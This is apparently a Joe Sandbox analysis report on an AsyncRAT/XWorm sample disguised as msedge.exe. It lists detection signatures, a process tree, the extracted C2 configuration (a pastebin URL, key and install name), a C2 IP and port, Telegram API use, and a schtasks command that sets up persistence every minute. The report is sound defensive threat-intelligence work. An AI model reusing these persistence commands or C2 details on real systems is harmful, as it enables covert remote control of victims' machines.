Edit tour

Windows Analysis Report
msedge.exe

Overview

General Information

Sample name:	msedge.exe
Analysis ID:	1566853
MD5:	f1c2525da4f545e783535c2875962c13
SHA1:	92bf515741775fac22690efc0e400f6997eba735
SHA256:	9e6985fdb3bfa539f3d6d6fca9aaf18356c28a00604c4f961562c34fa9f11d0f
Tags:	AsyncRATexeXWORMuser-DAVWE
Infos:

Detection

AsyncRAT, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AsyncRAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Connects to a pastebin service (likely for C&C)

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Sample uses string decryption to hide its real strings

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

msedge.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\msedge.exe" MD5: F1C2525DA4F545E783535C2875962C13)

schtasks.exe (PID: 6208 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 3616 cmdline: C:\Windows\system32\WerFault.exe -u -p 6924 -s 1484 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

msedge.exe (PID: 2816 cmdline: C:\Users\user\AppData\Local\msedge.exe MD5: F1C2525DA4F545E783535C2875962C13)

msedge.exe (PID: 2336 cmdline: "C:\Users\user\AppData\Local\msedge.exe" MD5: F1C2525DA4F545E783535C2875962C13)

msedge.exe (PID: 4584 cmdline: "C:\Users\user\AppData\Local\msedge.exe" MD5: F1C2525DA4F545E783535C2875962C13)

msedge.exe (PID: 5316 cmdline: C:\Users\user\AppData\Local\msedge.exe MD5: F1C2525DA4F545E783535C2875962C13)

msedge.exe (PID: 6072 cmdline: C:\Users\user\AppData\Local\msedge.exe MD5: F1C2525DA4F545E783535C2875962C13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["https://pastebin.com/raw/ZnhxAV6a"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
msedge.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
msedge.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
msedge.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x112d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11370:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x11485:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1092f:$cnc4: POST / HTTP/1.1

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\msedge.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Local\msedge.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\msedge.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x112d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11370:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x11485:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1092f:$cnc4: POST / HTTP/1.1

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x19d93:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3e7cb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x63203:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x19e30:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3e868:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x632a0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x19f45:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3e97d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x633b5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x193ef:$cnc4: POST / HTTP/1.1 0x3de27:$cnc4: POST / HTTP/1.1 0x6285f:$cnc4: POST / HTTP/1.1
00000000.00000000.1649838648.0000000000602000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000000.1649838648.0000000000602000.00000002.00000001.01000000.00000003.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x110d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11170:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x11285:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1072f:$cnc4: POST / HTTP/1.1
Process Memory Space: msedge.exe PID: 6924	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: msedge.exe PID: 6924	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.msedge.exe.600000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.0.msedge.exe.600000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.msedge.exe.600000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x112d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11370:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x11485:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1092f:$cnc4: POST / HTTP/1.1
0.2.msedge.exe.129fe4f8.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.msedge.exe.129fe4f8.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf4d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf570:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xf685:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xeb2f:$cnc4: POST / HTTP/1.1
0.2.msedge.exe.129d9ac0.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.msedge.exe.129d9ac0.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf4d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf570:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xf685:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xeb2f:$cnc4: POST / HTTP/1.1
0.2.msedge.exe.12a22f30.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.msedge.exe.12a22f30.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xf4d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xf570:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xf685:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xeb2f:$cnc4: POST / HTTP/1.1
0.2.msedge.exe.12a22f30.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.msedge.exe.12a22f30.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.msedge.exe.12a22f30.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x112d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11370:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x11485:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1092f:$cnc4: POST / HTTP/1.1
0.2.msedge.exe.129fe4f8.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.msedge.exe.129fe4f8.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.msedge.exe.129fe4f8.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x112d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x35d0b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11370:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x35da8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x11485:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x35ebd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1092f:$cnc4: POST / HTTP/1.1 0x35367:$cnc4: POST / HTTP/1.1
0.2.msedge.exe.129d9ac0.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.msedge.exe.129d9ac0.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.msedge.exe.129d9ac0.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x112d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x35d0b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5a743:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x11370:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x35da8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5a7e0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x11485:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x35ebd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x5a8f5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1092f:$cnc4: POST / HTTP/1.1 0x35367:$cnc4: POST / HTTP/1.1 0x59d9f:$cnc4: POST / HTTP/1.1
Click to see the 13 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\msedge.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\msedge.exe, ProcessId: 6924, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\msedge.exe, ProcessId: 6924, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\msedge.exe", ParentImage: C:\Users\user\Desktop\msedge.exe, ParentProcessId: 6924, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe", ProcessId: 6208, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T18:46:30.372526+0100	2853193	1	Malware Command and Control Activity Detected	192.168.2.4	49822	147.185.221.24	3865	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: msedge.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\msedge.exe

Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: msedge.exe

Malware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/ZnhxAV6a"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\msedge.exe

ReversingLabs: Detection: 78%

Multi AV Scanner detection for submitted file

Source: msedge.exe

ReversingLabs: Detection: 78%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\msedge.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: msedge.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: msedge.exe	String decryptor: https://pastebin.com/raw/ZnhxAV6a
Source: msedge.exe	String decryptor: <123456789>
Source: msedge.exe	String decryptor: <Xwormmm>
Source: msedge.exe	String decryptor: USB.exe

Source: msedge.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49955 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50012 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50025 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50037 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50049 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50062 version: TLS 1.2

Source: msedge.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.pdb@w^ source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: .pdb. source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdbHm source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: symbols\dll\mscorlib.pdbpdb` source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: 0C:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Core.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\msedge.PDB7 source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0F3000.00000004.00000020.00020000.00000000.sdmp, WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Drawing.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Management.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3563369376.000000001C0F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: indoC:\Windows\mscorlib.pdb source: msedge.exe, 00000000.00000002.3564025048.000000001CA89000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.pdbx source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER1A3A.tmp.dmp.14.dr
Source:	Binary string: System.Xml.pdbhG source: WER1A3A.tmp.dmp.14.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49732 -> 147.185.221.24:3865
Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49822 -> 147.185.221.24:3865

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://pastebin.com/raw/ZnhxAV6a

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: msedge.exe, type: SAMPLE
Source: Yara match	File source: 0.0.msedge.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.12a22f30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.4:49732 -> 147.185.221.24:3865

